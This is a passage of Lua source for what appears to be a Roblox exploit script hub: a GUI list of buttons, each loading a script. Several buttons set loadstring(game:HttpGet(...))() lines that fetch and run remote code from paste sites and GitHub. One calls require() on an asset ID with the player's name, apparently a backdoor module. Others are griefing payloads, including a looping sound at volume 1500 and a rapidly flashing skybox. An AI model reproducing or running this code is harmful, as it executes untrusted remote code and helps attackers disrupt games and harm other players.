scriptlist ssp.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ssp.Position = UDim2.new(0, 0, 0.0, 529) ssp.Size = UDim2.new(0, 132, 0, 23) ssp.Font = Enum.Font.Code ssp.Text = "SLEDGE HAMMER.TXT" ssp.TextColor3 = Color3.fromRGB(0, 0, 0) ssp.TextSize = 14.000 ssp.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://pastefy.app/jmJgSbvV/raw?part=Sledgehammer", true))()') end) disco.Name = "disco" disco.Parent = scriptlist disco.BackgroundColor3 = Color3.fromRGB(255, 255, 255) disco.Position = UDim2.new(0, 0, 0.0, 552) disco.Size = UDim2.new(0, 132, 0, 23) disco.Font = Enum.Font.Code disco.Text = "SEASOLA.TXT" disco.TextColor3 = Color3.fromRGB(0, 0, 0) disco.TextSize = 14.000 disco.MouseButton1Click:Connect(function() setScript('game:GetObjects("rbxassetid://78030789294372")[1].Parent = game.workspace') end) Dec.Name = "Dec" Dec.Parent = scriptlist Dec.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Dec.Position = UDim2.new(0, 0, 0.0, 575) Dec.Size = UDim2.new(0, 132, 0, 23) Dec.Font = Enum.Font.Code Dec.Text = "Skeletont Sky.txt" Dec.TextColor3 = Color3.fromRGB(0, 0, 0) Dec.TextSize = 14.000 Dec.MouseButton1Click:Connect(function() setScript([[ imageOne = "http://www.roblox.com/asset/?id=169585459" imageTwo = "http://www.roblox.com/asset/?id=169585475" imageThree = "http://www.roblox.com/asset/?id=169585485" imageFour = "http://www.roblox.com/asset/?id=169585502" imageFive = "http://www.roblox.com/asset/?id=169585515" imageSix = "http://www.roblox.com/asset/?id=169585502" imageSeven = "http://www.roblox.com/asset/?id=169585485" imageEight = "http://www.roblox.com/asset/?id=169585475" Spooky = Instance.new("Sound", game.Workspace) Spooky.Name = "Spooky" Spooky.SoundId = "rbxassetid://4808613510" Spooky.Volume = 1500 Spooky.Looped = true Spooky:Play() Sky = Instance.new("Sky", game.Lighting) Sky.SkyboxBk = imageOne Sky.SkyboxDn = imageOne Sky.SkyboxFt = imageOne Sky.SkyboxLf = imageOne Sky.SkyboxRt = imageOne Sky.SkyboxUp = imageOne while true do Sky.SkyboxBk = imageOne Sky.SkyboxDn = imageOne Sky.SkyboxFt = imageOne Sky.SkyboxLf = imageOne Sky.SkyboxRt = imageOne Sky.SkyboxUp = imageOne task.wait(0.25) Sky.SkyboxBk = imageTwo Sky.SkyboxDn = imageTwo Sky.SkyboxFt = imageTwo Sky.SkyboxLf = imageTwo Sky.SkyboxRt = imageTwo Sky.SkyboxUp = imageTwo task.wait(0.25) Sky.SkyboxBk = imageThree Sky.SkyboxDn = imageThree Sky.SkyboxFt = imageThree Sky.SkyboxLf = imageThree Sky.SkyboxRt = imageThree Sky.SkyboxUp = imageThree task.wait(0.25) Sky.SkyboxBk = imageFour Sky.SkyboxDn = imageFour Sky.SkyboxFt = imageFour Sky.SkyboxLf = imageFour Sky.SkyboxRt = imageFour Sky.SkyboxUp = imageFour task.wait(0.25) Sky.SkyboxBk = imageFive Sky.SkyboxDn = imageFive Sky.SkyboxFt = imageFive Sky.SkyboxLf = imageFive Sky.SkyboxRt = imageFive Sky.SkyboxUp = imageFive task.wait(0.25) Sky.SkyboxBk = imageSix Sky.SkyboxDn = imageSix Sky.SkyboxFt = imageSix Sky.SkyboxLf = imageSix Sky.SkyboxRt = imageSix Sky.SkyboxUp = imageSix task.wait(0.25) Sky.SkyboxBk = imageSeven Sky.SkyboxDn = imageSeven Sky.SkyboxFt = imageSeven Sky.SkyboxLf = imageSeven Sky.SkyboxRt = imageSeven Sky.SkyboxUp = imageSeven task.wait(0.25) Sky.SkyboxBk = imageEight Sky.SkyboxDn = imageEight Sky.SkyboxFt = imageEight Sky.SkyboxLf = imageEight Sky.SkyboxRt = imageEight Sky.SkyboxUp = imageEight task.wait(0.25) end ]]) end) jum.Name = "jum" jum.Parent = scriptlist jum.BackgroundColor3 = Color3.fromRGB(255, 255, 255) jum.Position = UDim2.new(0, 0, 0.0, 598) jum.Size = UDim2.new(0, 132, 0, 23) jum.Font = Enum.Font.Code jum.Text = "k00pgui.txt" jum.TextColor3 = Color3.fromRGB(0, 0, 0) jum.TextSize = 14.000 jum.MouseButton1Click:Connect(function() setScript('require(14829670677).EDITL0L(game:GetService("Players").LocalPlayer.Name)') end) DIS.Name = "DIS" DIS.Parent = scriptlist DIS.BackgroundColor3 = Color3.fromRGB(255, 255, 255) DIS.Position = UDim2.new(0, 0, 0.0, 621) DIS.Size = UDim2.new(0, 132, 0, 23) DIS.Font = Enum.Font.Code DIS.Text = "DISCO.TXT" DIS.TextColor3 = Color3.fromRGB(0, 0, 0) DIS.TextSize = 14.000 DIS.MouseButton1Click:Connect(function() setScript([[ local Lighting = game:GetService("Lighting") local ColorCorrection = Instance.new("ColorCorrectionEffect") ColorCorrection.Parent = Lighting local function zigzag(X) return math.acos(math.cos(X * math.pi)) / math.pi end local Counter = 0 Lighting.TimeOfDay = "12:00" while task.wait(0.1) do local color = Color3.fromHSV(zigzag(Counter), 1, 1) ColorCorrection.TintColor = color Lighting.Ambient = color Counter += 0.01 end ]]) end) Deca.Name = "Deca" Deca.Parent = scriptlist Deca.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Deca.Position = UDim2.new(0, 0, 0.0, 644) Deca.Size = UDim2.new(0, 132, 0, 23) Deca.Font = Enum.Font.Code Deca.Text = "STEVE.TXT" Deca.TextColor3 = Color3.fromRGB(0, 0, 0) Deca.TextSize = 14.000 Deca.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-Steve-script-24707"))()') end) ju.Name = "ju" ju.Parent = scriptlist ju.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ju.Position = UDim2.new(0, 0, 0.0, 667) ju.Size = UDim2.new(0, 132, 0, 23) ju.Font = Enum.Font.Code ju.Text = "RO XPLOIT V0.6.TXT" ju.TextColor3 = Color3.fromRGB(0, 0, 0) ju.TextSize = 14.000 ju.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-ro-xploit-6-9233"))()') end) shel.Name = "shel" shel.Parent = scriptlist shel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) shel.Position = UDim2.new(0, 0, 0.0, 690) shel.Size = UDim2.new(0, 132, 0, 23) shel.Font = Enum.Font.Code shel.Text = "ALL SEEING HAND.TXT" shel.TextColor3 = Color3.fromRGB(0, 0, 0) shel.TextSize = 14.000 shel.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://raw.githubusercontent.com/ian49972/SCRIPTS/refs/heads/main/Flowey"))()') end) hint.Name = "hint" hint.Parent = scriptlist hint.BackgroundColor3 = Color3.fromRGB(255, 255, 255) hint.Position = UDim2.new(0, 0, 0.0, 713) hint.Size = UDim2.new(0, 132, 0, 23) hint.Font = Enum.Font.Code hint.Text = "PATRICK.TXT" hint.TextColor3 = Color3.fromRGB(0, 0, 0) hint.TextSize = 14.000 hint.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://raw.githubusercontent.com/ian49972/SCRIPTS/refs/heads/main/Patrick"))()') end) hint2.Name = "hint2" hint2.Parent = scriptlist hint2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) hint2.Position = UDim2.new(0, 0, 0, 736) hint2.Size = UDim2.new(0, 132, 0, 23) hint2.Font = Enum.Font.Code hint2.Text = "R6.TXT" hint2.TextColor3 = Color3.fromRGB(0, 0, 0) hint2.TextSize = 14.000 hint2.MouseButton1Click:Connect(function() setScript('loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-r6-script-56753"))()') end)